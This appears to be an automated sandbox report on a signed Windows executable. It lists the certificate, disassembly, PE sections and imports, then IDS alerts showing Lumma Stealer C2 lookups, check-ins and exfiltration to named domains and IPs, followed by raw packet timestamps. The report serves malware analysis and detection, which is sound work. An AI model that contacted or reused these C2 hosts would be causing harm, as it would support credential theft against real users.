                                                                                                                                                                                                              Signature Valid:true
                                                                                                                                                                                                              Signature Issuer:CN=Sectigo Public Code Signing CA EV R36, O=Sectigo Limited, C=GB
                                                                                                                                                                                                              Signature Validation Error:The operation completed successfully
                                                                                                                                                                                                              Error Number:0
                                                                                                                                                                                                              Not Before, Not After
                                                                                                                                                                                                              • 22/10/2024 20:00:00 23/10/2025 19:59:59
                                                                                                                                                                                                              Subject Chain
                                                                                                                                                                                                              • CN=\u8881\u5dde\u533a\u521b\u65b0\u63a2\u7d22\u7f51\u7edc\u5de5\u4f5c\u5ba4\uff08\u4e2a\u4f53\u5de5\u5546\u6237\uff09, O=\u8881\u5dde\u533a\u521b\u65b0\u63a2\u7d22\u7f51\u7edc\u5de5\u4f5c\u5ba4\uff08\u4e2a\u4f53\u5de5\u5546\u6237\uff09, S=\u6c5f\u897f\u7701, C=CN, OID.2.5.4.15=Business Entity, OID.1.3.6.1.4.1.311.60.2.1.3=CN, SERIALNUMBER=92360902MADYXP3F14
                                                                                                                                                                                                              Version:3
                                                                                                                                                                                                              Thumbprint MD5:03E83BDACA900DD003355CC8E662D9FA
                                                                                                                                                                                                              Thumbprint SHA-1:CBF33B2C384509341A4D74C25B332DF2DF82B494
                                                                                                                                                                                                              Thumbprint SHA-256:522EC7DC5080E18BE2C2BDFEF1594B4167CD57D620ADEA28FF407784A49A3497
                                                                                                                                                                                                              Serial:334A8DC7BE701421BB5A00FEFCB26F50
Instruction (disassembly at entrypoint):
push ebp
mov ebp, esp
call 00007FCC98BB5DCDh
pop ebp
ret
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
push 00000000h
call dword ptr [0071400Ch]
mov eax, dword ptr [ebp+08h]
push eax
call dword ptr [00714008h]
push C0000409h
call dword ptr [00714010h]
push eax
call dword ptr [00714014h]
nop
pop ebp
ret
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
sub esp, 00000324h
push 00000017h
call dword ptr [00714018h]
test eax, eax
je 00007FCC98BB60C9h
mov ecx, 00000002h
int 29h
mov dword ptr [00723AD0h], eax
mov dword ptr [00723ACCh], ecx
mov dword ptr [00723AC8h], edx
mov dword ptr [00723AC4h], ebx
mov dword ptr [00723AC0h], esi
mov dword ptr [00723ABCh], edi
mov word ptr [00723AE8h], ss
mov word ptr [00723ADCh], cs
mov word ptr [00723AB8h], ds
mov word ptr [00723AB4h], es
mov word ptr [00723AB0h], fs
mov word ptr [00723AACh], gs
pushfd
pop dword ptr [00723AE0h]
mov eax, dword ptr [ebp+00h]
mov dword ptr [00723AD4h], eax
mov eax, dword ptr [ebp+04h]
mov dword ptr [00723AD8h], eax
lea eax, dword ptr [ebp+08h]
mov dword ptr [00723AE4h], eax
Data directories:
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x32238c | 0x28 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x325000 | 0xeb55 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x34ee00 | 0x4ad8 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x334000 | 0x1e1c4 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x3216e0 | 0x54 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x321620 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x314000 | 0x118 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Sections:
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x31265a | 0x312800 | 78205e5871918b833f6f9ddbca7a51e6 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x314000 | 0xe9d8 | 0xea00 | 5168e2efcb56f21388167389be17cb99 | False | 0.3250868055555556 | data | 4.593908806113169 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x323000 | 0x1b80 | 0xa00 | ac347fa16904e0c00d845293aa065859 | False | 0.21328125 | data | 2.5718746421367604 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x325000 | 0xeb55 | 0xec00 | aa6b34ce96afaf2bbbcc9abeddfe13b7 | False | 0.8014929819915254 | data | 6.91975740920949 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x334000 | 0x1e1c4 | 0x1e200 | fa9cecbf249aa3bf5c0b36b41962e84a | False | 0.7237827411825726 | data | 6.844856432656225 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x325628 | 0x9ae0 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.9888771186440678
RT_MENU | 0x32f108 | 0x29c | data | | | 0.5703592814371258
RT_DIALOG | 0x32f3a4 | 0x344 | data | | | 0.5418660287081339
RT_DIALOG | 0x32f6e8 | 0x2a0 | data | | | 0.5580357142857143
RT_DIALOG | 0x32f988 | 0x368 | data | | | 0.5263761467889908
RT_DIALOG | 0x32fcf0 | 0x3c4 | data | | | 0.5072614107883817
RT_DIALOG | 0x3300b4 | 0x4fc | data | | | 0.5047021943573667
RT_DIALOG | 0x3305b0 | 0x35c | data | | | 0.5395348837209303
RT_DIALOG | 0x33090c | 0x2d0 | data | | | 0.55
RT_DIALOG | 0x330bdc | 0x31c | data | | | 0.5527638190954773
RT_DIALOG | 0x330ef8 | 0x2e0 | data | | | 0.5679347826086957
RT_DIALOG | 0x3311d8 | 0x4d4 | data | | | 0.4919093851132686
RT_DIALOG | 0x3316ac | 0x308 | data | | | 0.5476804123711341
RT_DIALOG | 0x3319b4 | 0x3fc | data | | | 0.538235294117647
RT_STRING | 0x331db0 | 0x3c | data | | | 0.65
RT_STRING | 0x331dec | 0x180 | data | | | 0.5911458333333334
RT_STRING | 0x331f6c | 0x190 | data | | | 0.6025
RT_STRING | 0x3320fc | 0x178 | data | | | 0.6090425531914894
RT_STRING | 0x332274 | 0x170 | data | | | 0.6195652173913043
RT_STRING | 0x3323e4 | 0x190 | data | | | 0.605
RT_STRING | 0x332574 | 0x188 | data | | | 0.6071428571428571
RT_STRING | 0x3326fc | 0x1a8 | data | | | 0.5943396226415094
RT_STRING | 0x3328a4 | 0x190 | AmigaOS bitmap font "a", fc_YSize 25088, 22784 elements, 2nd "t", 3rd | | | 0.595
RT_STRING | 0x332a34 | 0xbc | data | | | 0.6595744680851063
RT_MESSAGETABLE | 0x332af0 | 0x498 | Matlab v4 mat-file (little endian) I, rows 55, columns 57, imaginary | | | 0.4923469387755102
RT_MESSAGETABLE | 0x332f88 | 0x550 | Matlab v4 mat-file (little endian) I, rows 54, columns 57, imaginary | | | 0.4838235294117647
RT_MESSAGETABLE | 0x3334d8 | 0x4ec | Matlab v4 mat-file (little endian) \211, rows 116, columns 121, imaginary | | | 0.4936507936507937
RT_GROUP_ICON | 0x3339c4 | 0x14 | data | | | 1.1
RT_MANIFEST | 0x3339d8 | 0x17d | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.5931758530183727
DLL | Import
KERNEL32.dll | VirtualProtect, CloseHandle, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, RtlUnwind, GetLastError, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, EncodePointer, RaiseException, GetStdHandle, WriteFile, GetModuleFileNameW, ExitProcess, GetModuleHandleExW, HeapAlloc, HeapValidate, GetSystemInfo, OutputDebugStringW, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetStdHandle, GetFileType, GetStringTypeW, LCMapStringW, GetProcessHeap, HeapFree, HeapReAlloc, HeapSize, HeapQueryInformation, WriteConsoleW, SetFilePointerEx, FlushFileBuffers, GetConsoleOutputCP, GetConsoleMode, DecodePointer, CreateFileW
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-18T09:58:34.461277+0100 | 2058222 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (immureprech .biz) | 1 | 192.168.2.8 | 52795 | 1.1.1.1 | 53 | UDP
2024-12-18T09:58:35.448316+0100 | 2058222 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (immureprech .biz) | 1 | 192.168.2.8 | 52795 | 1.1.1.1 | 53 | UDP
2024-12-18T09:58:37.556615+0100 | 2058223 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (immureprech .biz in TLS SNI) | 1 | 192.168.2.8 | 49712 | 178.62.201.34 | 443 | TCP
2024-12-18T09:58:37.556615+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49712 | 178.62.201.34 | 443 | TCP
2024-12-18T09:58:37.558557+0100 | 2822521 | ETPRO MALWARE Malicious SSL Certificate Detected (Linux.Rex Scanner) | 1 | 178.62.201.34 | 443 | 192.168.2.8 | 49712 | TCP
2024-12-18T09:58:38.131521+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.8 | 49712 | 178.62.201.34 | 443 | TCP
2024-12-18T09:58:38.131521+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.8 | 49712 | 178.62.201.34 | 443 | TCP
2024-12-18T09:58:38.138129+0100 | 2058214 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (deafeninggeh .biz) | 1 | 192.168.2.8 | 54576 | 1.1.1.1 | 53 | UDP
2024-12-18T09:58:39.135253+0100 | 2058214 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (deafeninggeh .biz) | 1 | 192.168.2.8 | 54576 | 1.1.1.1 | 53 | UDP
2024-12-18T09:58:41.328110+0100 | 2058215 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (deafeninggeh .biz in TLS SNI) | 1 | 192.168.2.8 | 49713 | 45.77.249.79 | 443 | TCP
2024-12-18T09:58:41.328110+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49713 | 45.77.249.79 | 443 | TCP
2024-12-18T09:58:41.432096+0100 | 2822521 | ETPRO MALWARE Malicious SSL Certificate Detected (Linux.Rex Scanner) | 1 | 45.77.249.79 | 443 | 192.168.2.8 | 49713 | TCP
2024-12-18T09:58:42.516776+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.8 | 49713 | 45.77.249.79 | 443 | TCP
2024-12-18T09:58:42.516776+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.8 | 49713 | 45.77.249.79 | 443 | TCP
2024-12-18T09:58:42.536331+0100 | 2058220 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (effecterectz .xyz) | 1 | 192.168.2.8 | 65325 | 1.1.1.1 | 53 | UDP
2024-12-18T09:58:42.847703+0100 | 2058218 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (diffuculttan .xyz) | 1 | 192.168.2.8 | 52922 | 1.1.1.1 | 53 | UDP
2024-12-18T09:58:43.075720+0100 | 2058216 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (debonairnukk .xyz) | 1 | 192.168.2.8 | 58557 | 1.1.1.1 | 53 | UDP
2024-12-18T09:58:43.381328+0100 | 2058236 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wrathful-jammy .cyou) | 1 | 192.168.2.8 | 56284 | 1.1.1.1 | 53 | UDP
2024-12-18T09:58:43.610498+0100 | 2058210 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (awake-weaves .cyou) | 1 | 192.168.2.8 | 58299 | 1.1.1.1 | 53 | UDP
2024-12-18T09:58:43.846754+0100 | 2058226 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou) | 1 | 192.168.2.8 | 59296 | 1.1.1.1 | 53 | UDP
2024-12-18T09:58:45.603019+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49714 | 23.55.153.106 | 443 | TCP
2024-12-18T09:58:46.363652+0100 | 2858666 | ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup | 1 | 192.168.2.8 | 49714 | 23.55.153.106 | 443 | TCP
2024-12-18T09:58:47.956560+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49715 | 104.21.66.86 | 443 | TCP
2024-12-18T09:58:49.061153+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.8 | 49715 | 104.21.66.86 | 443 | TCP
2024-12-18T09:58:49.061153+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.8 | 49715 | 104.21.66.86 | 443 | TCP
2024-12-18T09:58:50.485048+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49716 | 104.21.66.86 | 443 | TCP
2024-12-18T09:58:51.308205+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.8 | 49716 | 104.21.66.86 | 443 | TCP
2024-12-18T09:58:51.308205+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.8 | 49716 | 104.21.66.86 | 443 | TCP
2024-12-18T09:58:53.515162+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49717 | 104.21.66.86 | 443 | TCP
2024-12-18T09:58:55.867927+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49718 | 104.21.66.86 | 443 | TCP
2024-12-18T09:58:57.737935+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.8 | 49718 | 104.21.66.86 | 443 | TCP
2024-12-18T09:58:59.279633+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49719 | 104.21.66.86 | 443 | TCP
2024-12-18T09:59:02.733201+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49720 | 104.21.66.86 | 443 | TCP
2024-12-18T09:59:05.287293+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49721 | 104.21.66.86 | 443 | TCP
2024-12-18T09:59:09.101015+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49722 | 104.21.66.86 | 443 | TCP
2024-12-18T09:59:09.910836+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.8 | 49722 | 104.21.66.86 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 18, 2024 09:58:36.079425097 CET | 49712 | 443 | 192.168.2.8 | 178.62.201.34
Dec 18, 2024 09:58:36.079515934 CET | 443 | 49712 | 178.62.201.34 | 192.168.2.8
Dec 18, 2024 09:58:36.079693079 CET | 49712 | 443 | 192.168.2.8 | 178.62.201.34
Dec 18, 2024 09:58:36.113697052 CET | 49712 | 443 | 192.168.2.8 | 178.62.201.34
Dec 18, 2024 09:58:36.113730907 CET | 443 | 49712 | 178.62.201.34 | 192.168.2.8
Dec 18, 2024 09:58:37.556263924 CET | 443 | 49712 | 178.62.201.34 | 192.168.2.8
Dec 18, 2024 09:58:37.556615114 CET | 49712 | 443 | 192.168.2.8 | 178.62.201.34
Dec 18, 2024 09:58:37.558532953 CET | 49712 | 443 | 192.168.2.8 | 178.62.201.34
Dec 18, 2024 09:58:37.558557034 CET | 443 | 49712 | 178.62.201.34 | 192.168.2.8
Dec 18, 2024 09:58:37.558795929 CET | 443 | 49712 | 178.62.201.34 | 192.168.2.8
Dec 18, 2024 09:58:37.602605104 CET | 49712 | 443 | 192.168.2.8 | 178.62.201.34
Dec 18, 2024 09:58:37.602606058 CET | 49712 | 443 | 192.168.2.8 | 178.62.201.34
Dec 18, 2024 09:58:37.602771044 CET | 443 | 49712 | 178.62.201.34 | 192.168.2.8
Dec 18, 2024 09:58:38.131524086 CET | 443 | 49712 | 178.62.201.34 | 192.168.2.8
Dec 18, 2024 09:58:38.131618023 CET | 443 | 49712 | 178.62.201.34 | 192.168.2.8
Dec 18, 2024 09:58:38.131695032 CET | 49712 | 443 | 192.168.2.8 | 178.62.201.34
Dec 18, 2024 09:58:38.133796930 CET | 49712 | 443 | 192.168.2.8 | 178.62.201.34
Dec 18, 2024 09:58:38.133827925 CET | 443 | 49712 | 178.62.201.34 | 192.168.2.8
Dec 18, 2024 09:58:38.133846998 CET | 49712 | 443 | 192.168.2.8 | 178.62.201.34
Dec 18, 2024 09:58:38.133855104 CET | 443 | 49712 | 178.62.201.34 | 192.168.2.8
Dec 18, 2024 09:58:39.412523031 CET | 49713 | 443 | 192.168.2.8 | 45.77.249.79
Dec 18, 2024 09:58:39.412626028 CET | 443 | 49713 | 45.77.249.79 | 192.168.2.8
Dec 18, 2024 09:58:39.412738085 CET | 49713 | 443 | 192.168.2.8 | 45.77.249.79
Dec 18, 2024 09:58:39.413091898 CET | 49713 | 443 | 192.168.2.8 | 45.77.249.79
Dec 18, 2024 09:58:39.413124084 CET | 443 | 49713 | 45.77.249.79 | 192.168.2.8
Dec 18, 2024 09:58:41.328022003 CET | 443 | 49713 | 45.77.249.79 | 192.168.2.8
Dec 18, 2024 09:58:41.328109980 CET | 49713 | 443 | 192.168.2.8 | 45.77.249.79
Dec 18, 2024 09:58:41.432040930 CET | 49713 | 443 | 192.168.2.8 | 45.77.249.79
Dec 18, 2024 09:58:41.432096004 CET | 443 | 49713 | 45.77.249.79 | 192.168.2.8
Dec 18, 2024 09:58:41.433099031 CET | 443 | 49713 | 45.77.249.79 | 192.168.2.8
Dec 18, 2024 09:58:41.455795050 CET | 49713 | 443 | 192.168.2.8 | 45.77.249.79
Dec 18, 2024 09:58:41.455827951 CET | 49713 | 443 | 192.168.2.8 | 45.77.249.79
Dec 18, 2024 09:58:41.455988884 CET | 443 | 49713 | 45.77.249.79 | 192.168.2.8
Dec 18, 2024 09:58:42.516841888 CET | 443 | 49713 | 45.77.249.79 | 192.168.2.8
Dec 18, 2024 09:58:42.517055988 CET | 443 | 49713 | 45.77.249.79 | 192.168.2.8
Dec 18, 2024 09:58:42.517182112 CET | 49713 | 443 | 192.168.2.8 | 45.77.249.79
Dec 18, 2024 09:58:42.517182112 CET | 49713 | 443 | 192.168.2.8 | 45.77.249.79
Dec 18, 2024 09:58:42.517182112 CET | 49713 | 443 | 192.168.2.8 | 45.77.249.79
Dec 18, 2024 09:58:42.517275095 CET | 443 | 49713 | 45.77.249.79 | 192.168.2.8
Dec 18, 2024 09:58:42.744412899 CET | 49713 | 443 | 192.168.2.8 | 45.77.249.79
Dec 18, 2024 09:58:42.744479895 CET | 443 | 49713 | 45.77.249.79 | 192.168.2.8
Dec 18, 2024 09:58:44.213092089 CET | 49714 | 443 | 192.168.2.8 | 23.55.153.106
Dec 18, 2024 09:58:44.213146925 CET | 443 | 49714 | 23.55.153.106 | 192.168.2.8
Dec 18, 2024 09:58:44.213228941 CET | 49714 | 443 | 192.168.2.8 | 23.55.153.106
Dec 18, 2024 09:58:44.213671923 CET | 49714 | 443 | 192.168.2.8 | 23.55.153.106
Dec 18, 2024 09:58:44.213690996 CET | 443 | 49714 | 23.55.153.106 | 192.168.2.8
Dec 18, 2024 09:58:45.602896929 CET | 443 | 49714 | 23.55.153.106 | 192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:45.603018999 CET49714443192.168.2.823.55.153.106
                                                                                                                                                                                                              Dec 18, 2024 09:58:45.604775906 CET49714443192.168.2.823.55.153.106
                                                                                                                                                                                                              Dec 18, 2024 09:58:45.604787111 CET4434971423.55.153.106192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:45.605189085 CET4434971423.55.153.106192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:45.606432915 CET49714443192.168.2.823.55.153.106
                                                                                                                                                                                                              Dec 18, 2024 09:58:45.647329092 CET4434971423.55.153.106192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:46.363806009 CET4434971423.55.153.106192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:46.363887072 CET4434971423.55.153.106192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:46.363929987 CET4434971423.55.153.106192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:46.364068985 CET49714443192.168.2.823.55.153.106
                                                                                                                                                                                                              Dec 18, 2024 09:58:46.364137888 CET4434971423.55.153.106192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:46.364178896 CET49714443192.168.2.823.55.153.106
                                                                                                                                                                                                              Dec 18, 2024 09:58:46.364198923 CET49714443192.168.2.823.55.153.106
                                                                                                                                                                                                              Dec 18, 2024 09:58:46.540576935 CET4434971423.55.153.106192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:46.540635109 CET4434971423.55.153.106192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:46.540699005 CET49714443192.168.2.823.55.153.106
                                                                                                                                                                                                              Dec 18, 2024 09:58:46.540762901 CET4434971423.55.153.106192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:46.540810108 CET49714443192.168.2.823.55.153.106
                                                                                                                                                                                                              Dec 18, 2024 09:58:46.582823038 CET4434971423.55.153.106192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:46.582880974 CET4434971423.55.153.106192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:46.583014965 CET4434971423.55.153.106192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:46.583015919 CET49714443192.168.2.823.55.153.106
                                                                                                                                                                                                              Dec 18, 2024 09:58:46.583085060 CET49714443192.168.2.823.55.153.106
                                                                                                                                                                                                              Dec 18, 2024 09:58:46.584208012 CET49714443192.168.2.823.55.153.106
                                                                                                                                                                                                              Dec 18, 2024 09:58:46.584208012 CET49714443192.168.2.823.55.153.106
                                                                                                                                                                                                              Dec 18, 2024 09:58:46.584252119 CET4434971423.55.153.106192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:46.584280968 CET4434971423.55.153.106192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:46.731173992 CET49715443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:58:46.731210947 CET44349715104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:46.731287003 CET49715443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:58:46.731730938 CET49715443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:58:46.731744051 CET44349715104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:47.956490040 CET44349715104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:47.956559896 CET49715443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:58:47.958035946 CET49715443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:58:47.958043098 CET44349715104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:47.958445072 CET44349715104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:47.959520102 CET49715443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:58:47.959559917 CET49715443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:58:47.959609985 CET44349715104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:49.061233044 CET44349715104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:49.061481953 CET44349715104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:49.061547995 CET49715443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:58:49.062160969 CET49715443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:58:49.062176943 CET44349715104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:49.257061958 CET49716443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:58:49.257155895 CET44349716104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:49.257294893 CET49716443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:58:49.257859945 CET49716443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:58:49.257899046 CET44349716104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:50.484922886 CET44349716104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:50.485048056 CET49716443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:58:50.486192942 CET49716443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:58:50.486223936 CET44349716104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:50.487154007 CET44349716104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:50.488178968 CET49716443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:58:50.488229036 CET49716443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:58:50.488408089 CET44349716104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:51.308229923 CET44349716104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:51.308341980 CET44349716104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:51.308409929 CET49716443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:58:51.308439970 CET44349716104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:51.308734894 CET44349716104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:51.308789015 CET44349716104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:51.308789968 CET49716443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:58:51.308805943 CET44349716104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:51.308841944 CET49716443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:58:51.316639900 CET44349716104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:51.325241089 CET44349716104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:51.325310946 CET49716443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:58:51.325347900 CET44349716104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:51.369471073 CET49716443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:58:51.369514942 CET44349716104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:51.416292906 CET49716443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:58:51.449991941 CET44349716104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:51.494429111 CET49716443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:58:51.494477034 CET44349716104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:51.541306019 CET49716443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:58:51.541352034 CET44349716104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:51.569581985 CET44349716104.21.66.86192.168.2.8
